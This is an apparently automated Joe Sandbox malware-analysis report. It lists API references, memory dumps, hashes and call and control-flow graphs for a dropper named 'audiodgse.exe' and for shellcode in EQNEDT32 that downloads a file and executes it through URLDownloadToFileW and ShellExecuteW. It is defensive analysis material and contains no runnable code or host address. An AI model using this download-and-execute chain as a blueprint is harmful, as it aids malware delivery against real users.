                                                  • Opcode Fuzzy Hash: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                                  • Instruction Fuzzy Hash: 3F017171100649ABDF219F11DD80A9F7A65EB84314F208037FA017A2D1D77A9C51DEEA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004056A2
                                                  • CloseHandle.KERNEL32(?), ref: 004056AF
                                                  Strings
                                                  • Error launching installer, xrefs: 0040568C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                  • Instruction ID: 7ab3ce879d7da258620b5dd87dc6aa02706b67d8cc8a7f981bd8ed1ee31a9d30
                                                  • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                  • Instruction Fuzzy Hash: 46E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,75712754,00000000,C:\Users\user\AppData\Local\Temp\,0040373A,00403554,?,?,00000006,00000008,0000000A), ref: 0040377C
                                                  • GlobalFree.KERNEL32(002E9EC0), ref: 00403783
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403762
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-4017390910
                                                  • Opcode ID: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                                  • Instruction ID: ee514f1fc3f324b596d41214b75e1b85a5e4a54197580a2dff82031d974a72f0
                                                  • Opcode Fuzzy Hash: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                                  • Instruction Fuzzy Hash: 40E0C27380112097C7251F07EC04B5A776CAF45B22F01C02AEC007B3A0C7742C418BD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402E30,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\audiodgse.exe,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 004059BF
                                                  • CharPrevA.USER32(80000000,00000000), ref: 004059CD
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming, xrefs: 004059B9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\AppData\Roaming
                                                  • API String ID: 2709904686-2707566632
                                                  • Opcode ID: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                  • Instruction ID: a086819795abd80aa1ad59fb022c9920fa60cb9da26d6d2253466900a8022463
                                                  • Opcode Fuzzy Hash: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                  • Instruction Fuzzy Hash: 3FD0A7E3408DB05EE70353149C04B9F6A48CF12310F0900A3F180A21A6C67C1C414BFE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 72BE115B
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE11B4
                                                  • GlobalFree.KERNEL32(?), ref: 72BE11C7
                                                  • GlobalFree.KERNEL32(?), ref: 72BE11F5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: b5452da17f32653a87773a78e161d96a9c8a58e1decf0c25eb4fae15afa8722c
                                                  • Instruction ID: a21d0206931dc1d88e8aff85fdf9423cd2f8ad131a62db82e66c39bbf3cdde98
                                                  • Opcode Fuzzy Hash: b5452da17f32653a87773a78e161d96a9c8a58e1decf0c25eb4fae15afa8722c
                                                  • Instruction Fuzzy Hash: 8C318DB2C64145DFE7218F7AD948B257FF8EB85291F3459A9E847C3151E7348C40CB15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B00
                                                  • CharNextA.USER32(00000000), ref: 00405B11
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                  • Instruction ID: 2cbfd0870324320007afb9b70b5ca04d8eb3af27e3ea935175830c0dc6d3898b
                                                  • Opcode Fuzzy Hash: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                  • Instruction Fuzzy Hash: 50F0C231604414BFC702DBA9DC40D9EBBB8EF46250B2540A6E800F7251D274FE01ABA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:4.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:213
                                                  Total number of Limit Nodes:3
                                                  execution_graph 2271 35f015e 2273 35f00b2 2271->2273 2298 35f030d ExitProcess 2273->2298 2299 35f0319 2298->2299 2300 35f0326 21 API calls 2298->2300 2301 35f0342 18 API calls 2299->2301 2300->2299 2303 35f0333 2301->2303 2302 35f037b 2303->2302 2304 35f03c2 2303->2304 2306 35f0359 2303->2306 2305 35f03da 11 API calls 2304->2305 2307 35f03c7 2305->2307 2306->2302 2306->2307 2308 35f0363 2306->2308 2309 35f03eb URLDownloadToFileW 2307->2309 2310 35f0435 8 API calls 2307->2310 2318 35f043c 2307->2318 2314 35f03ab 15 API calls 2308->2314 2316 35f044e 5 API calls 2309->2316 2310->2309 2311 35f0463 3 API calls 2312 35f0455 2311->2312 2315 35f045d ShellExecuteW 2312->2315 2319 35f02fb 2312->2319 2314->2302 2317 35f0488 ExitProcess 2315->2317 2316->2318 2320 35f047c 2317->2320 2318->2311 2322 35f0326 2319->2322 2320->2319 2321 35f048b ExitProcess 2320->2321 2323 35f032c 2322->2323 2324 35f0342 18 API calls 2323->2324 2325 35f0333 2323->2325 2324->2325 2326 35f037b 2325->2326 2327 35f03c2 2325->2327 2329 35f0359 2325->2329 2328 35f03da 11 API calls 2327->2328 2330 35f03c7 2328->2330 2329->2326 2329->2330 2331 35f0363 2329->2331 2332 35f03eb URLDownloadToFileW 2330->2332 2333 35f0435 8 API calls 2330->2333 2341 35f043c 2330->2341 2337 35f03ab 15 API calls 2331->2337 2339 35f044e 5 API calls 2332->2339 2333->2332 2334 35f0463 3 API calls 2335 35f0455 2334->2335 2338 35f045d ShellExecuteW 2335->2338 2342 35f0319 2335->2342 2337->2326 2340 35f0488 ExitProcess 2338->2340 2339->2341 2343 35f047c 2340->2343 2341->2334 2345 35f0342 2342->2345 2343->2342 2344 35f048b ExitProcess 2343->2344 2346 35f0348 2345->2346 2372 35f0369 2346->2372 2373 35f036c 2372->2373 2374 35f03ab 15 API calls 2373->2374 2375 35f037b 2374->2375 2208 35f048f GetPEB 2209 35f049d 2208->2209 2593 35f01c6 2596 35f00b2 2593->2596 2594 35f030d 25 API calls 2595 35f02fb 2594->2595 2597 35f0326 21 API calls 2595->2597 2596->2593 2596->2594 2598 35f0319 2597->2598 2599 35f0342 18 API calls 2598->2599 2600 35f0333 2599->2600 2601 35f037b 2600->2601 2602 35f03c2 2600->2602 2604 35f0359 2600->2604 2603 35f03da 11 API calls 2602->2603 2605 35f03c7 2603->2605 2604->2601 2604->2605 2607 35f0363 2604->2607 2606 35f043c 2605->2606 2608 35f03eb URLDownloadToFileW 2605->2608 2609 35f0435 8 API calls 2605->2609 2610 35f0463 3 API calls 2606->2610 2613 35f03ab 15 API calls 2607->2613 2615 35f044e 5 API calls 2608->2615 2609->2608 2611 35f0455 2610->2611 2614 35f045d ShellExecuteW 2611->2614 2617 35f04c2 2611->2617 2613->2601 2616 35f0488 ExitProcess 2614->2616 2615->2606 2618 35f047c 2616->2618 2618->2617 2619 35f048b ExitProcess 2618->2619 2674 35f0000 2676 35f000e 2674->2676 2675 35f0024 2676->2675 2679 35f0091 2676->2679 2680 35f00b2 2679->2680 2681 35f030d 25 API calls 2680->2681 2682 35f02fb 2681->2682 2683 35f0326 21 API calls 2682->2683 2684 35f0319 2683->2684 2685 35f0342 18 API calls 2684->2685 2686 35f0333 2685->2686 2687 35f03c2 2686->2687 2689 35f0359 2686->2689 2701 35f037b 2686->2701 2688 35f03da 11 API calls 2687->2688 2690 35f03c7 2688->2690 2689->2690 2692 35f0363 2689->2692 2689->2701 2691 35f043c 2690->2691 2693 35f03eb URLDownloadToFileW 2690->2693 2694 35f0435 8 API calls 2690->2694 2695 35f0463 3 API calls 2691->2695 2698 35f03ab 15 API calls 2692->2698 2700 35f044e 5 API calls 2693->2700 2694->2693 2696 35f0455 2695->2696 2699 35f045d ShellExecuteW 2696->2699 2703 35f0071 2696->2703 2698->2701 2702 35f0488 ExitProcess 2699->2702 2700->2691 2704 35f047c 2702->2704 2704->2703 2705 35f048b ExitProcess 2704->2705 2733 35f0073 2734 35f00b2 2733->2734 2735 35f030d 25 API calls 2734->2735 2736 35f02fb 2735->2736 2737 35f0326 21 API calls 2736->2737 2738 35f0319 2737->2738 2739 35f0342 18 API calls 2738->2739 2740 35f0333 2739->2740 2741 35f037b 2740->2741 2742 35f03c2 2740->2742 2744 35f0359 2740->2744 2743 35f03da 11 API calls 2742->2743 2745 35f03c7 2743->2745 2744->2741 2744->2745 2746 35f0363 2744->2746 2747 35f03eb URLDownloadToFileW 2745->2747 2748 35f0435 8 API calls 2745->2748 2756 35f043c 2745->2756 2752 35f03ab 15 API calls 2746->2752 2754 35f044e 5 API calls 2747->2754 2748->2747 2749 35f0463 3 API calls 2750 35f0455 2749->2750 2753 35f045d ShellExecuteW 2750->2753 2758 35f04c2 2750->2758 2752->2741 2755 35f0488 ExitProcess 2753->2755 2754->2756 2757 35f047c 2755->2757 2756->2749 2757->2758 2759 35f048b ExitProcess 2757->2759 2210 35f03ab 2211 35f03ad 2210->2211 2214 35f03c0 LoadLibraryW 2211->2214 2215 35f03c2 2214->2215 2230 35f03da 2215->2230 2217 35f043c 2253 35f0463 2217->2253 2219 35f03eb URLDownloadToFileW 2244 35f044e 2219->2244 2224 35f045d ShellExecuteW 2259 35f0488 2224->2259 2227 35f047c 2228 35f03b2 2227->2228 2229 35f048b ExitProcess 2227->2229 2231 35f03dd 2230->2231 2232 35f0435 8 API calls 2231->2232 2233 35f03eb URLDownloadToFileW 2232->2233 2235 35f044e 5 API calls 2233->2235 2236 35f043e 2235->2236 2237 35f0463 3 API calls 2236->2237 2238 35f0455 2237->2238 2239 35f045d ShellExecuteW 2238->2239 2240 35f03c7 2238->2240 2241 35f0488 ExitProcess 2239->2241 2240->2217 2240->2219 2261 35f0435 URLDownloadToFileW 2240->2261 2242 35f047c 2241->2242 2242->2240 2243 35f048b ExitProcess 2242->2243 2245 35f0450 2244->2245 2246 35f0455 2245->2246 2247 35f0463 3 API calls 2245->2247 2248 35f045d ShellExecuteW 2246->2248 2250 35f04c2 2246->2250 2247->2246 2249 35f0488 ExitProcess 2248->2249 2251 35f047c 2249->2251 2250->2217 2251->2250 2252 35f048b ExitProcess 2251->2252 2254 35f0466 ShellExecuteW 2253->2254 2255 35f0488 ExitProcess 2254->2255 2256 35f047c 2254->2256 2255->2256 2257 35f048b ExitProcess 2256->2257 2258 35f0455 2256->2258 2258->2224 2258->2228 2260 35f048b ExitProcess 2259->2260 2262 35f043e 2261->2262 2263 35f044e 5 API calls 2261->2263 2264 35f0463 3 API calls 2262->2264 2263->2262 2265 35f0455 2264->2265 2266 35f045d ShellExecuteW 2265->2266 2267 35f04c2 2265->2267 2268 35f0488 ExitProcess 2266->2268 2267->2219 2269 35f047c 2268->2269 2269->2267 2270 35f048b ExitProcess 2269->2270 2868 35f0126 2875 35f00b2 2868->2875 2869 35f01b6 2870 35f030d 25 API calls 2871 35f02fb 2870->2871 2872 35f0326 21 API calls 2871->2872 2873 35f0319 2872->2873 2874 35f0342 18 API calls 2873->2874 2876 35f0333 2874->2876 2875->2869 2875->2870 2877 35f037b 2876->2877 2878 35f03c2 2876->2878 2880 35f0359 2876->2880 2879 35f03da 11 API calls 2878->2879 2881 35f03c7 2879->2881 2880->2877 2880->2881 2883 35f0363 2880->2883 2882 35f043c 2881->2882 2884 35f03eb URLDownloadToFileW 2881->2884 2885 35f0435 8 API calls 2881->2885 2886 35f0463 3 API calls 2882->2886 2889 35f03ab 15 API calls 2883->2889 2891 35f044e 5 API calls 2884->2891 2885->2884 2887 35f0455 2886->2887 2890 35f045d ShellExecuteW 2887->2890 2893 35f04c2 2887->2893 2889->2877 2892 35f0488 ExitProcess 2890->2892 2891->2882 2894 35f047c 2892->2894 2894->2893 2895 35f048b ExitProcess 2894->2895

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_035F015E 3 Function_035F03DA 0->3 10 Function_035F044E 0->10 11 Function_035F030D 0->11 14 Function_035F0488 0->14 18 Function_035F0342 0->18 24 Function_035F0435 0->24 30 Function_035F03AB 0->30 34 Function_035F0326 0->34 37 Function_035F0463 0->37 1 Function_035F00DC 1->3 1->10 1->11 1->14 1->18 1->24 1->30 1->34 1->37 2 Function_035F011B 2->3 2->10 2->11 2->14 2->18 2->24 2->30 2->34 2->37 3->10 3->14 3->24 3->37 4 Function_035F00D7 4->3 4->10 4->11 4->14 4->18 4->24 4->30 4->34 4->37 5 Function_035F0116 5->3 5->10 5->11 5->14 5->18 5->24 5->30 5->34 5->37 6 Function_035F0193 6->3 6->10 6->11 6->14 6->18 6->24 6->30 6->34 6->37 7 Function_035F0091 7->3 7->10 7->11 7->14 7->18 7->24 7->30 7->34 7->37 8 Function_035F0110 8->3 8->10 8->11 8->14 8->18 8->24 8->30 8->34 8->37 9 Function_035F048F 23 Function_035F04B7 9->23 10->14 10->37 11->3 11->10 11->14 11->18 11->24 11->30 11->34 11->37 12 Function_035F00CB 12->3 12->10 12->11 12->14 12->18 12->24 12->30 12->34 12->37 13 Function_035F014B 13->3 13->10 13->11 13->14 13->18 13->24 13->30 13->34 13->37 15 Function_035F0508 16 Function_035F01C6 16->3 16->10 16->11 16->14 16->18 16->24 16->30 16->34 16->37 17 Function_035F0143 17->3 17->10 17->11 17->14 17->18 17->24 17->30 17->34 17->37 18->3 18->10 18->14 18->15 18->24 18->30 32 Function_035F0369 18->32 18->37 19 Function_035F0101 19->3 19->10 19->11 19->14 19->18 19->24 19->30 19->34 19->37 20 Function_035F03C0 20->3 20->10 20->14 20->24 20->37 21 Function_035F0000 21->7 22 Function_035F00FD 22->3 22->10 22->11 22->14 22->18 22->24 22->30 22->34 22->37 24->10 24->14 24->37 25 Function_035F0073 25->3 25->10 25->11 25->14 25->18 25->24 25->30 25->34 25->37 26 Function_035F00F2 26->3 26->10 26->11 26->14 26->18 26->24 26->30 26->34 26->37 27 Function_035F00AD 27->3 27->10 27->11 27->14 27->18 27->24 27->30 27->34 27->37 28 Function_035F00ED 29 Function_035F00AB 29->3 29->10 29->11 29->14 29->18 29->24 29->30 29->34 29->37 30->20 31 Function_035F026B 32->30 33 Function_035F0169 33->3 33->10 33->11 33->14 33->18 33->24 33->30 33->34 33->37 34->3 34->10 34->14 34->15 34->18 34->24 34->30 34->37 35 Function_035F0126 35->3 35->10 35->11 35->14 35->18 35->24 35->30 35->34 35->37 36 Function_035F00A5 36->3 36->10 36->11 36->14 36->18 36->24 36->30 36->34 36->37 37->14 38 Function_035F02E3 38->3 38->10 38->11 38->14 38->18 38->24 38->30 38->34 38->37 39 Function_035F00A1 39->3 39->10 39->11 39->14 39->18 39->24 39->30 39->34 39->37 40 Function_035F0160 40->3 40->10 40->11 40->14 40->18 40->24 40->30 40->34 40->37

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 35f03c0-35f03cc LoadLibraryW call 35f03da 5 35f03ce-35f03e5 0->5 6 35f043c-35f043e 0->6 9 35f03eb-35f0439 URLDownloadToFileW call 35f044e 5->9 10 35f03e6 call 35f0435 5->10 7 35f0440-35f045b call 35f0463 6->7 15 35f045d-35f047f ShellExecuteW call 35f0488 7->15 16 35f04c2-35f04ce 7->16 20 35f043e 9->20 10->9 18 35f04d1 15->18 30 35f0481 15->30 16->18 21 35f04d9-35f04dd 18->21 22 35f04d3-35f04d7 18->22 20->7 25 35f04df-35f04e3 21->25 26 35f04f2-35f04f4 21->26 22->21 24 35f04e5-35f04ec 22->24 28 35f04ee 24->28 29 35f04f0 24->29 25->24 25->26 31 35f0504-35f0505 26->31 28->26 29->26 32 35f04f6-35f04ff 29->32 30->26 33 35f0483-35f048d ExitProcess 30->33 36 35f04c8-35f04cb 32->36 37 35f0501 32->37 36->32 39 35f04cd 36->39 37->31 39->18
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(035F03B2), ref: 035F03C0
                                                    • Part of subcall function 035F03DA: URLDownloadToFileW.URLMON(00000000,035F03EB,?,00000000,00000000), ref: 035F0437
                                                    • Part of subcall function 035F03DA: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475
                                                    • Part of subcall function 035F03DA: ExitProcess.KERNEL32(00000000), ref: 035F048D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                  • String ID:
                                                  • API String ID: 2508257586-0
                                                  • Opcode ID: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
                                                  • Instruction ID: a995b0cae59ebe390d5a4a8d56712e49fa0e29783981cfb5526f8a9c0c4e74c3
                                                  • Opcode Fuzzy Hash: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
                                                  • Instruction Fuzzy Hash: 5621599284D7C22FDB1397301C6EB65BF646F63104F5D89CEE5C20A4E3E2989401C766
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 40 35f0342-35f0350 call 35f0508 call 35f0369 45 35f03c2-35f03c9 call 35f03da 40->45 46 35f0352-35f0357 40->46 50 35f03ca-35f03cc 45->50 46->45 48 35f0359 46->48 49 35f035b-35f035f 48->49 48->50 52 35f03b4-35f03be 49->52 53 35f0361 49->53 54 35f03ce-35f03d4 50->54 55 35f043c-35f043e 50->55 56 35f03d5-35f03e5 53->56 57 35f0363-35f03b1 call 35f03ab 53->57 54->56 58 35f0440-35f045b call 35f0463 55->58 60 35f03eb-35f043e URLDownloadToFileW call 35f044e 56->60 61 35f03e6 call 35f0435 56->61 57->52 68 35f045d-35f047f ShellExecuteW call 35f0488 58->68 69 35f04c2-35f04ce 58->69 60->58 61->60 72 35f04d1 68->72 86 35f0481 68->86 69->72 76 35f04d9-35f04dd 72->76 77 35f04d3-35f04d7 72->77 81 35f04df-35f04e3 76->81 82 35f04f2-35f04f4 76->82 77->76 80 35f04e5-35f04ec 77->80 84 35f04ee 80->84 85 35f04f0 80->85 81->80 81->82 87 35f0504-35f0505 82->87 84->82 85->82 88 35f04f6-35f04ff 85->88 86->82 89 35f0483-35f048d ExitProcess 86->89 92 35f04c8-35f04cb 88->92 93 35f0501 88->93 92->88 95 35f04cd 92->95 93->87 95->72
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(00000000,035F03EB,?,00000000,00000000), ref: 035F0437
                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475
                                                  • ExitProcess.KERNEL32(00000000), ref: 035F048D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
                                                  • Instruction ID: 5b2261ab2afe23202ce8112292d786dcb401c589e4cff9d5afb278705cfb8c70
                                                  • Opcode Fuzzy Hash: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
                                                  • Instruction Fuzzy Hash: 4741A89680D7C12FDB12EB302D6EA55BF607B63100F5D89CEDAC64E4E3E2989101C767
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 96 35f03da-35f045b call 35f0435 URLDownloadToFileW call 35f044e call 35f0463 107 35f045d-35f047f ShellExecuteW call 35f0488 96->107 108 35f04c2-35f04ce 96->108 109 35f04d1 107->109 120 35f0481 107->120 108->109 111 35f04d9-35f04dd 109->111 112 35f04d3-35f04d7 109->112 115 35f04df-35f04e3 111->115 116 35f04f2-35f04f4 111->116 112->111 114 35f04e5-35f04ec 112->114 118 35f04ee 114->118 119 35f04f0 114->119 115->114 115->116 121 35f0504-35f0505 116->121 118->116 119->116 122 35f04f6-35f04ff 119->122 120->116 123 35f0483-35f048d ExitProcess 120->123 126 35f04c8-35f04cb 122->126 127 35f0501 122->127 126->122 129 35f04cd 126->129 127->121 129->109
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
                                                  • Instruction ID: 4a30858d0a334e5444ff6c085ceeb7d431d427e57a1014aa01161432902f4181
                                                  • Opcode Fuzzy Hash: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
                                                  • Instruction Fuzzy Hash: A721239694C7C22FDB139B301C6EB55BF642F63104F5D89CEE6C64A4E3E2A88440CB66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
